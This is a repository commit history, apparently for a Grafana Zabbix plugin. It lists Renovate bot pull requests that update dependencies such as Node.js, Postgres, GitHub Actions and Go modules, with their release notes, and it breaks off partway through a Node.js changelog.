2b5bfd4de634dd710ea2f4ffdc04c5bd2cebec72
2295 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
renovate-sh-app[bot]
|
2b5bfd4de6 |
chore(deps): update grafana/plugin-ci-workflows/ci-cd-workflows action to v5.1.0 (#2186)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [grafana/plugin-ci-workflows](https://redirect.github.com/grafana/plugin-ci-workflows) | action | minor | `ci-cd-workflows/v5.0.0` → `ci-cd-workflows/v5.1.0` | --- ### Release Notes <details> <summary>grafana/plugin-ci-workflows (grafana/plugin-ci-workflows)</summary> ### [`vci-cd-workflows/v5.1.0`](https://redirect.github.com/grafana/plugin-ci-workflows/releases/tag/ci-cd-workflows/v5.1.0): ci-cd-workflows: v5.1.0 [Compare Source](https://redirect.github.com/grafana/plugin-ci-workflows/compare/ci-cd-workflows/v5.0.0...ci-cd-workflows/v5.1.0) ##### 🎉 Features - **ci:** setup Go version from go.mod if possible ([#​465](https://redirect.github.com/grafana/plugin-ci-workflows/issues/465)) ([5d5ab0a]( |
||
|
renovate-sh-app[bot]
|
5be89db773 |
chore(deps): update postgres docker tag to v18 (#2182)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | postgres | major | `16` → `18` | | postgres | major | `15` → `18` | | postgres | major | `14` → `18` | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1ham9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
0316e42c8b |
chore(deps): pin dependencies (#2173)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [@testing-library/dom](https://redirect.github.com/testing-library/dom-testing-library) | devDependencies | pin | [`^10.4.1` → `10.4.1`](https://renovatebot.com/diffs/npm/@testing-library%2fdom/10.4.1/10.4.1) | | alpine | | pinDigest | → `865b95f` | | grafana/grafana-enterprise | final | pinDigest | → `703b4a3` | | postgres | | pinDigest | → `056b54f` | | postgres | | pinDigest | → `a7711af` | | postgres | | pinDigest | → `5fd97d3` | | python | final | pinDigest | → `cfa6231` | | python | final | pinDigest | → `0c5171f` | | python | final | pinDigest | → `411fa4d` | | python | final | pinDigest | → `6d58c1a` | | redis | | pinDigest | → `6cbef35` | | zabbix/zabbix-agent | | pinDigest | → `2a5989f` | | zabbix/zabbix-agent | | pinDigest | → `0bb96e2` | | zabbix/zabbix-agent | | pinDigest | → `71f1f22` | | zabbix/zabbix-agent | | pinDigest | → `9eab77e` | | zabbix/zabbix-agent | | pinDigest | → `c34ca68` | | zabbix/zabbix-proxy-sqlite3 | | pinDigest | → `a963b30` | | zabbix/zabbix-server-pgsql | | pinDigest | → `a6f748d` | | zabbix/zabbix-server-pgsql | | pinDigest | → `5c1aece` | | zabbix/zabbix-server-pgsql | | pinDigest | → `b3c1451` | | zabbix/zabbix-server-pgsql | | pinDigest | → `dbc5a2a` | | zabbix/zabbix-server-pgsql | | pinDigest | → `b88c636` | | zabbix/zabbix-web-apache-pgsql | | pinDigest | → `9b5ad53` | | zabbix/zabbix-web-apache-pgsql | | pinDigest | → `70a301e` | | zabbix/zabbix-web-nginx-pgsql | | pinDigest | → `08b2b13` | | zabbix/zabbix-web-nginx-pgsql | | pinDigest | → `e034dd9` | | zabbix/zabbix-web-nginx-pgsql | | pinDigest | → `90d9d85` | Add the preset `:preserveSemverRanges` to your config if you don't want to pin your dependencies. --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiZG9ja2VyIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: Jocelyn Collado-Kuri <jcolladokuri@icloud.com> |
||
|
renovate-sh-app[bot]
|
28c32d4dbf |
chore(deps): update grafana/plugin-ci-workflows/ci-cd-workflows action to v5.0.0 (#2180)
This PR contains the following updates: | Package | Type | Update | Change | Pending | |---|---|---|---|---| | [grafana/plugin-ci-workflows](https://redirect.github.com/grafana/plugin-ci-workflows) | action | major | `ci-cd-workflows/v4.3.0` → `ci-cd-workflows/v5.0.0` | `ci-cd-workflows/v5.1.0` | --- ### Release Notes <details> <summary>grafana/plugin-ci-workflows (grafana/plugin-ci-workflows)</summary> ### [`vci-cd-workflows/v5.0.0`](https://redirect.github.com/grafana/plugin-ci-workflows/releases/tag/ci-cd-workflows/v5.0.0): ci-cd-workflows: v5.0.0 [Compare Source](https://redirect.github.com/grafana/plugin-ci-workflows/compare/ci-cd-workflows/v4.3.0...ci-cd-workflows/v5.0.0) ##### ⚠ BREAKING CHANGES - **ci:** `universal-zip-url-*` outputs are now URLs rather than paths - **deps:** Update default Node version to 24 LTS ([#​439](https://redirect.github.com/grafana/plugin-ci-workflows/issues/439)) - **deps:** Update default golangci-lint version to 2.7.2 ([#​439](https://redirect.github.com/grafana/plugin-ci-workflows/issues/439)) - **deps:** Update default Go version to 1.25 ([#​439](https://redirect.github.com/grafana/plugin-ci-workflows/issues/439)) - **ci:** use pm-detect to understand nodejs package manager ([#​204](https://redirect.github.com/grafana/plugin-ci-workflows/issues/204)) *** The `package-manager` input has been removed from `ci.yml`. If you were using it, please remove it from your workflow. The correct package manager will now be detected automatically from the plugin's source code. Supported package managers are npm, yarn and pnpm. *** golangci-lint has been bumped from v1 to v2 in order to support Go 1.25. The config file format for golangci-lint has changed and has to be migrated. Please follow [golangci-lint's migration guide](https://golangci-lint.run/docs/product/migration-guide/) for more information. If you want to revert to Go 1.24 and golangci-lint v1, add the following to both your CI and your CD workflows: ```yaml inputs: go-version: "1.24" golangci-lint-version: "1.64.8" ``` ##### 🎉 Features - **ci:** use pm-detect to understand nodejs package manager ([#​204](https://redirect.github.com/grafana/plugin-ci-workflows/issues/204)) ([e739fbe]( |
||
|
renovate-sh-app[bot]
|
3ea69e2f8e |
fix(deps): update module golang.org/x/net to v0.48.0 (#2176)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [golang.org/x/net](https://pkg.go.dev/golang.org/x/net) | [`v0.46.0` → `v0.48.0`](https://cs.opensource.google/go/x/net/+/refs/tags/v0.46.0...refs/tags/v0.48.0) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> --------- Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: Jocelyn Collado-Kuri <jcolladokuri@icloud.com> |
||
|
renovate-sh-app[bot]
|
d95723f540 |
chore(deps): update actions/checkout action to v6 (#2177)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/checkout](https://redirect.github.com/actions/checkout) | action | major | `v4.3.1` → `v6.0.1` | --- ### Release Notes <details> <summary>actions/checkout (actions/checkout)</summary> ### [`v6.0.1`](https://redirect.github.com/actions/checkout/releases/tag/v6.0.1) [Compare Source](https://redirect.github.com/actions/checkout/compare/v6.0.0...v6.0.1) #### What's Changed - Update all references from v5 and v4 to v6 by [@​ericsciple](https://redirect.github.com/ericsciple) in [#​2314](https://redirect.github.com/actions/checkout/pull/2314) - Add worktree support for persist-credentials includeIf by [@​ericsciple](https://redirect.github.com/ericsciple) in [#​2327](https://redirect.github.com/actions/checkout/pull/2327) - Clarify v6 README by [@​ericsciple](https://redirect.github.com/ericsciple) in [#​2328](https://redirect.github.com/actions/checkout/pull/2328) **Full Changelog**: <https://github.com/actions/checkout/compare/v6...v6.0.1> ### [`v6.0.0`](https://redirect.github.com/actions/checkout/releases/tag/v6.0.0) [Compare Source](https://redirect.github.com/actions/checkout/compare/v5.0.1...v6.0.0) ##### What's Changed - Update README to include Node.js 24 support details and requirements by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​2248](https://redirect.github.com/actions/checkout/pull/2248) - Persist creds to a separate file by [@​ericsciple](https://redirect.github.com/ericsciple) in [#​2286](https://redirect.github.com/actions/checkout/pull/2286) - v6-beta by [@​ericsciple](https://redirect.github.com/ericsciple) in [#​2298](https://redirect.github.com/actions/checkout/pull/2298) - update readme/changelog for v6 by [@​ericsciple](https://redirect.github.com/ericsciple) in [#​2311](https://redirect.github.com/actions/checkout/pull/2311) **Full Changelog**: <https://github.com/actions/checkout/compare/v5.0.0...v6.0.0> ### [`v5.0.1`](https://redirect.github.com/actions/checkout/releases/tag/v5.0.1) [Compare Source](https://redirect.github.com/actions/checkout/compare/v5.0.0...v5.0.1) #### What's Changed - Port v6 cleanup to v5 by [@​ericsciple](https://redirect.github.com/ericsciple) in [#​2301](https://redirect.github.com/actions/checkout/pull/2301) **Full Changelog**: <https://github.com/actions/checkout/compare/v5...v5.0.1> ### [`v5.0.0`](https://redirect.github.com/actions/checkout/releases/tag/v5.0.0) [Compare Source](https://redirect.github.com/actions/checkout/compare/v4.3.1...v5.0.0) ##### What's Changed - Update actions checkout to use node 24 by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​2226](https://redirect.github.com/actions/checkout/pull/2226) - Prepare v5.0.0 release by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​2238](https://redirect.github.com/actions/checkout/pull/2238) ##### ⚠️ Minimum Compatible Runner Version **v2.327.1**\ [Release Notes](https://redirect.github.com/actions/runner/releases/tag/v2.327.1) Make sure your runner is updated to this version or newer to use this release. **Full Changelog**: <https://github.com/actions/checkout/compare/v4...v5.0.0> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1ham9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
ea5d4e8284 |
chore(deps): update actions/stale action to v10 (#2179)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/stale](https://redirect.github.com/actions/stale) | action | major | `v9.1.0` → `v10.1.1` | --- ### Release Notes <details> <summary>actions/stale (actions/stale)</summary> ### [`v10.1.1`](https://redirect.github.com/actions/stale/releases/tag/v10.1.1) [Compare Source](https://redirect.github.com/actions/stale/compare/v10.1.0...v10.1.1) #### What's Changed ##### Bug Fix - Add Missing Input Reading for `only-issue-types` by [@​Bibo-Joshi](https://redirect.github.com/Bibo-Joshi) in [#​1298](https://redirect.github.com/actions/stale/pull/1298) ##### Improvement - Improves error handling when rate limiting is disabled on GHES. by [@​chiranjib-swain](https://redirect.github.com/chiranjib-swain) in [#​1300](https://redirect.github.com/actions/stale/pull/1300) ##### Dependency Upgrades - Upgrade eslint-config-prettier from 8.10.0 to 10.1.8 by [@​dependabot](https://redirect.github.com/dependabot) in [#​1276](https://redirect.github.com/actions/stale/pull/1276) - Upgrade [@​types/node](https://redirect.github.com/types/node) from 20.10.3 to 24.2.0 and document breaking changes in v10 by [@​dependabot](https://redirect.github.com/dependabot) in [#​1280](https://redirect.github.com/actions/stale/pull/1280) - Upgrade actions/publish-action from 0.3.0 to 0.4.0 by [@​dependabot](https://redirect.github.com/dependabot) in [#​1291](https://redirect.github.com/actions/stale/pull/1291) - Upgrade actions/checkout from 4 to 6 by [@​dependabot](https://redirect.github.com/dependabot) in [#​1306](https://redirect.github.com/actions/stale/pull/1306) #### New Contributors - [@​chiranjib-swain](https://redirect.github.com/chiranjib-swain) made their first contribution in [#​1300](https://redirect.github.com/actions/stale/pull/1300) **Full Changelog**: <https://github.com/actions/stale/compare/v10...v10.1.1> ### [`v10.1.0`](https://redirect.github.com/actions/stale/releases/tag/v10.1.0) [Compare Source](https://redirect.github.com/actions/stale/compare/v10.0.0...v10.1.0) #### What's Changed - Add `only-issue-types` option to filter issues by type by [@​Bibo-Joshi](https://redirect.github.com/Bibo-Joshi) in [#​1255](https://redirect.github.com/actions/stale/pull/1255) #### New Contributors - [@​Bibo-Joshi](https://redirect.github.com/Bibo-Joshi) made their first contribution in [#​1255](https://redirect.github.com/actions/stale/pull/1255) **Full Changelog**: <https://github.com/actions/stale/compare/v10...v10.1.0> ### [`v10.0.0`](https://redirect.github.com/actions/stale/releases/tag/v10.0.0) [Compare Source](https://redirect.github.com/actions/stale/compare/v9.1.0...v10.0.0) #### What's Changed ##### Breaking Changes - Upgrade to node 24 by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​1279](https://redirect.github.com/actions/stale/pull/1279) Make sure your runner is on version v2.327.1 or later to ensure compatibility with this release. [Release Notes](https://redirect.github.com/actions/runner/releases/tag/v2.327.1) ##### Enhancement - Introducing sort-by option by [@​suyashgaonkar](https://redirect.github.com/suyashgaonkar) in [#​1254](https://redirect.github.com/actions/stale/pull/1254) ##### Dependency Upgrades - Upgrade actions/publish-immutable-action from 0.0.3 to 0.0.4 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​1186](https://redirect.github.com/actions/stale/pull/1186) - Upgrade undici from 5.28.4 to 5.28.5 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​1201](https://redirect.github.com/actions/stale/pull/1201) - Upgrade [@​action/cache](https://redirect.github.com/action/cache) from 4.0.0 to 4.0.2 by [@​aparnajyothi-y](https://redirect.github.com/aparnajyothi-y) in [#​1226](https://redirect.github.com/actions/stale/pull/1226) - Upgrade [@​action/cache](https://redirect.github.com/action/cache) from 4.0.2 to 4.0.3 by [@​suyashgaonkar](https://redirect.github.com/suyashgaonkar) in [#​1233](https://redirect.github.com/actions/stale/pull/1233) - Upgrade undici from 5.28.5 to 5.29.0 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​1251](https://redirect.github.com/actions/stale/pull/1251) - Upgrade form-data to bring in fix for critical vulnerability by [@​gowridurgad](https://redirect.github.com/gowridurgad) in [#​1277](https://redirect.github.com/actions/stale/pull/1277) ##### Documentation changes - Changelog update for recent releases by [@​suyashgaonkar](https://redirect.github.com/suyashgaonkar) in [#​1224](https://redirect.github.com/actions/stale/pull/1224) - Permissions update in Readme by [@​ghadimir](https://redirect.github.com/ghadimir) in [#​1248](https://redirect.github.com/actions/stale/pull/1248) #### New Contributors - [@​suyashgaonkar](https://redirect.github.com/suyashgaonkar) made their first contribution in [#​1224](https://redirect.github.com/actions/stale/pull/1224) - [@​GhadimiR](https://redirect.github.com/GhadimiR) made their first contribution in [#​1248](https://redirect.github.com/actions/stale/pull/1248) - [@​gowridurgad](https://redirect.github.com/gowridurgad) made their first contribution in [#​1277](https://redirect.github.com/actions/stale/pull/1277) - [@​salmanmkc](https://redirect.github.com/salmanmkc) made their first contribution in [#​1279](https://redirect.github.com/actions/stale/pull/1279) **Full Changelog**: <https://github.com/actions/stale/compare/v9...v10.0.0> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1ham9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
7709b9ab2f |
chore(deps): update node.js to v24 (#2181)
> **Note:** This PR body was truncated due to platform limits. This PR contains the following updates: | Package | Update | Change | |---|---|---| | [node](https://nodejs.org) ([source](https://redirect.github.com/nodejs/node)) | major | `22` → `24` | --- ### Release Notes <details> <summary>nodejs/node (node)</summary> ### [`v24.12.0`](https://redirect.github.com/nodejs/node/releases/tag/v24.12.0): 2025-12-10, Version 24.12.0 'Krypton' (LTS), @​targos [Compare Source](https://redirect.github.com/nodejs/node/compare/v24.11.1...v24.12.0) ##### Notable Changes - \[[`1a00b5f68a`](https://redirect.github.com/nodejs/node/commit/1a00b5f68a)] - **(SEMVER-MINOR)** **http**: add optimizeEmptyRequests server option (Rafael Gonzaga) [#​59778](https://redirect.github.com/nodejs/node/pull/59778) - \[[`ff5754077d`](https://redirect.github.com/nodejs/node/commit/ff5754077d)] - **(SEMVER-MINOR)** **lib**: add options to util.deprecate (Rafael Gonzaga) [#​59982](https://redirect.github.com/nodejs/node/pull/59982) - \[[`8987159234`](https://redirect.github.com/nodejs/node/commit/8987159234)] - **(SEMVER-MINOR)** **module**: mark type stripping as stable (Marco Ippolito) [#​60600](https://redirect.github.com/nodejs/node/pull/60600) - \[[`92c484ebf4`](https://redirect.github.com/nodejs/node/commit/92c484ebf4)] - **(SEMVER-MINOR)** **node-api**: add napi\_create\_object\_with\_properties (Miguel Marcondes Filho) [#​59953](https://redirect.github.com/nodejs/node/pull/59953) - \[[`b11bc5984e`](https://redirect.github.com/nodejs/node/commit/b11bc5984e)] - **(SEMVER-MINOR)** **sqlite**: allow setting defensive flag (Bart Louwers) [#​60217](https://redirect.github.com/nodejs/node/pull/60217) - \[[`e7da5b4b7d`](https://redirect.github.com/nodejs/node/commit/e7da5b4b7d)] - **(SEMVER-MINOR)** **src**: add watch config namespace (Marco Ippolito) [#​60178](https://redirect.github.com/nodejs/node/pull/60178) - \[[`a7f7d10c06`](https://redirect.github.com/nodejs/node/commit/a7f7d10c06)] - **(SEMVER-MINOR)** **src**: add an option to make compile cache portable (Aditi) [#​58797](https://redirect.github.com/nodejs/node/pull/58797) - \[[`92ea669240`](https://redirect.github.com/nodejs/node/commit/92ea669240)] - **(SEMVER-MINOR)** **src,permission**: add --allow-inspector ability (Rafael Gonzaga) [#​59711](https://redirect.github.com/nodejs/node/pull/59711) - \[[`05d7509bd2`](https://redirect.github.com/nodejs/node/commit/05d7509bd2)] - **(SEMVER-MINOR)** **v8**: add cpu profile (theanarkh) [#​59807](https://redirect.github.com/nodejs/node/pull/59807) ##### Commits - \[[`e4a23a35ac`](https://redirect.github.com/nodejs/node/commit/e4a23a35ac)] - **benchmark**: focus on import.meta intialization in import-meta benchmark (Joyee Cheung) [#​60603](https://redirect.github.com/nodejs/node/pull/60603) - \[[`b6114ae5c9`](https://redirect.github.com/nodejs/node/commit/b6114ae5c9)] - **benchmark**: add per-suite setup option (Joyee Cheung) [#​60574](https://redirect.github.com/nodejs/node/pull/60574) - \[[`ac8e90af7c`](https://redirect.github.com/nodejs/node/commit/ac8e90af7c)] - **buffer**: speed up concat via TypedArray#set (Gürgün Dayıoğlu) [#​60399](https://redirect.github.com/nodejs/node/pull/60399) - \[[`acbc8ca13e`](https://redirect.github.com/nodejs/node/commit/acbc8ca13e)] - **build**: upgrade Python linter ruff, add rules ASYNC,PERF (Christian Clauss) [#​59984](https://redirect.github.com/nodejs/node/pull/59984) - \[[`f97a609a07`](https://redirect.github.com/nodejs/node/commit/f97a609a07)] - **console**: optimize single-string logging (Gürgün Dayıoğlu) [#​60422](https://redirect.github.com/nodejs/node/pull/60422) - \[[`6cd9bdc580`](https://redirect.github.com/nodejs/node/commit/6cd9bdc580)] - **crypto**: ensure documented RSA-PSS saltLength default is used (Filip Skokan) [#​60662](https://redirect.github.com/nodejs/node/pull/60662) - \[[`0fafe24d9b`](https://redirect.github.com/nodejs/node/commit/0fafe24d9b)] - **crypto**: fix argument validation in crypto.timingSafeEqual fast path (Joyee Cheung) [#​60538](https://redirect.github.com/nodejs/node/pull/60538) - \[[`54421e0419`](https://redirect.github.com/nodejs/node/commit/54421e0419)] - **debugger**: fix event listener leak in the run command (Joyee Cheung) [#​60464](https://redirect.github.com/nodejs/node/pull/60464) - \[[`c361a628b4`](https://redirect.github.com/nodejs/node/commit/c361a628b4)] - **deps**: V8: cherry-pick [`72b0e27`](https://redirect.github.com/nodejs/node/commit/72b0e27bd936) (pthier) [#​60732](https://redirect.github.com/nodejs/node/pull/60732) - \[[`c70f4588dd`](https://redirect.github.com/nodejs/node/commit/c70f4588dd)] - **deps**: V8: cherry-pick [`6bb32bd`](https://redirect.github.com/nodejs/node/commit/6bb32bd2c194) (Erik Corry) [#​60732](https://redirect.github.com/nodejs/node/pull/60732) - \[[`881fe784c5`](https://redirect.github.com/nodejs/node/commit/881fe784c5)] - **deps**: V8: cherry-pick [`0dd2318`](https://redirect.github.com/nodejs/node/commit/0dd2318b5237) (Erik Corry) [#​60732](https://redirect.github.com/nodejs/node/pull/60732) - \[[`457c33efcc`](https://redirect.github.com/nodejs/node/commit/457c33efcc)] - **deps**: V8: cherry-pick [`df20105`](https://redirect.github.com/nodejs/node/commit/df20105ccf36) (Erik Corry) [#​60732](https://redirect.github.com/nodejs/node/pull/60732) - \[[`0bf45a829c`](https://redirect.github.com/nodejs/node/commit/0bf45a829c)] - **deps**: V8: backport [`e5dbbba`](https://redirect.github.com/nodejs/node/commit/e5dbbbadcbff) (Darshan Sen) [#​60524](https://redirect.github.com/nodejs/node/pull/60524) - \[[`4993bdc476`](https://redirect.github.com/nodejs/node/commit/4993bdc476)] - **deps**: V8: cherry-pick [`5ba9200`](https://redirect.github.com/nodejs/node/commit/5ba9200cd046) (Juan José Arboleda) [#​60620](https://redirect.github.com/nodejs/node/pull/60620) - \[[`1e9abe0078`](https://redirect.github.com/nodejs/node/commit/1e9abe0078)] - **deps**: update corepack to 0.34.5 (Node.js GitHub Bot) [#​60842](https://redirect.github.com/nodejs/node/pull/60842) - \[[`3f704ed08f`](https://redirect.github.com/nodejs/node/commit/3f704ed08f)] - **deps**: update corepack to 0.34.4 (Node.js GitHub Bot) [#​60643](https://redirect.github.com/nodejs/node/pull/60643) - \[[`04e360fdb1`](https://redirect.github.com/nodejs/node/commit/04e360fdb1)] - **deps**: V8: cherry-pick [`06bf293`](https://redirect.github.com/nodejs/node/commit/06bf293610ef), [`146962d`](https://redirect.github.com/nodejs/node/commit/146962dda8d2) and [`e0fb10b`](https://redirect.github.com/nodejs/node/commit/e0fb10b5148c) (Michaël Zasso) [#​60713](https://redirect.github.com/nodejs/node/pull/60713) - \[[`fcbd8dbbde`](https://redirect.github.com/nodejs/node/commit/fcbd8dbbde)] - **deps**: patch V8 to 13.6.233.17 (Michaël Zasso) [#​60712](https://redirect.github.com/nodejs/node/pull/60712) - \[[`28e9433f39`](https://redirect.github.com/nodejs/node/commit/28e9433f39)] - **deps**: V8: cherry-pick [`8735658`](https://redirect.github.com/nodejs/node/commit/87356585659b) (Joyee Cheung) [#​60069](https://redirect.github.com/nodejs/node/pull/60069) - \[[`3cac85b243`](https://redirect.github.com/nodejs/node/commit/3cac85b243)] - **deps**: V8: backport [`2e4c5cf`](https://redirect.github.com/nodejs/node/commit/2e4c5cf9b112) (Michaël Zasso) [#​60654](https://redirect.github.com/nodejs/node/pull/60654) - \[[`1daece1970`](https://redirect.github.com/nodejs/node/commit/1daece1970)] - **deps**: call OPENSSL\_free after ANS1\_STRING\_to\_UTF8 (Rafael Gonzaga) [#​60609](https://redirect.github.com/nodejs/node/pull/60609) - \[[`5f55a9c9ea`](https://redirect.github.com/nodejs/node/commit/5f55a9c9ea)] - **deps**: nghttp2: revert [`7784fa9`](https://redirect.github.com/nodejs/node/commit/7784fa979d0b) (Antoine du Hamel) [#​59790](https://redirect.github.com/nodejs/node/pull/59790) - \[[`1d9e7c1f4d`](https://redirect.github.com/nodejs/node/commit/1d9e7c1f4d)] - **deps**: update nghttp2 to 1.67.1 (nodejs-github-bot) [#​59790](https://redirect.github.com/nodejs/node/pull/59790) - \[[`3140415068`](https://redirect.github.com/nodejs/node/commit/3140415068)] - **deps**: update simdjson to 4.1.0 (Node.js GitHub Bot) [#​60542](https://redirect.github.com/nodejs/node/pull/60542) - \[[`d911f9f1b8`](https://redirect.github.com/nodejs/node/commit/d911f9f1b8)] - **deps**: update amaro to 1.1.5 (Node.js GitHub Bot) [#​60541](https://redirect.github.com/nodejs/node/pull/60541) - \[[`daaaf04a32`](https://redirect.github.com/nodejs/node/commit/daaaf04a32)] - **deps**: V8: cherry-pick [`2abc613`](https://redirect.github.com/nodejs/node/commit/2abc61361dd4) (Richard Lau) [#​60177](https://redirect.github.com/nodejs/node/pull/60177) - \[[`b4f63ee5f8`](https://redirect.github.com/nodejs/node/commit/b4f63ee5f8)] - **doc**: update Collaborators list to reflect hybrist handle change (Antoine du Hamel) [#​60650](https://redirect.github.com/nodejs/node/pull/60650) - \[[`effcf7a8ab`](https://redirect.github.com/nodejs/node/commit/effcf7a8ab)] - **doc**: fix link in `--env-file=file` section (N. Bighetti) [#​60563](https://redirect.github.com/nodejs/node/pull/60563) - \[[`7011736703`](https://redirect.github.com/nodejs/node/commit/7011736703)] - **doc**: fix linter issues (Antoine du Hamel) [#​60636](https://redirect.github.com/nodejs/node/pull/60636) - \[[`5cc79d8945`](https://redirect.github.com/nodejs/node/commit/5cc79d8945)] - **doc**: add missing history entry for `sqlite.md` (Antoine du Hamel) [#​60607](https://redirect.github.com/nodejs/node/pull/60607) - \[[`bbc649057c`](https://redirect.github.com/nodejs/node/commit/bbc649057c)] - **doc**: correct values/references for buffer.kMaxLength (René) [#​60305](https://redirect.github.com/nodejs/node/pull/60305) - \[[`ea7ecb517b`](https://redirect.github.com/nodejs/node/commit/ea7ecb517b)] - **doc**: recommend events.once to manage 'close' event (Dan Fabulich) [#​60017](https://redirect.github.com/nodejs/node/pull/60017) - \[[`58bff04cc2`](https://redirect.github.com/nodejs/node/commit/58bff04cc2)] - **doc**: highlight module loading difference between import and require (Ajay A) [#​59815](https://redirect.github.com/nodejs/node/pull/59815) - \[[`bbcbff9b4d`](https://redirect.github.com/nodejs/node/commit/bbcbff9b4d)] - **doc**: add CJS code snippets in `sqlite.md` (Allon Murienik) [#​60395](https://redirect.github.com/nodejs/node/pull/60395) - \[[`f8af33d5a7`](https://redirect.github.com/nodejs/node/commit/f8af33d5a7)] - **doc**: fix typo in `process.unref` documentation (우혁) [#​59698](https://redirect.github.com/nodejs/node/pull/59698) - \[[`df105dc351`](https://redirect.github.com/nodejs/node/commit/df105dc351)] - **doc**: add some entries to `glossary.md` (Mohataseem Khan) [#​59277](https://redirect.github.com/nodejs/node/pull/59277) - \[[`4955cb2b5b`](https://redirect.github.com/nodejs/node/commit/4955cb2b5b)] - **doc**: improve agent.createConnection docs for http and https agents (JaeHo Jang) [#​58205](https://redirect.github.com/nodejs/node/pull/58205) - 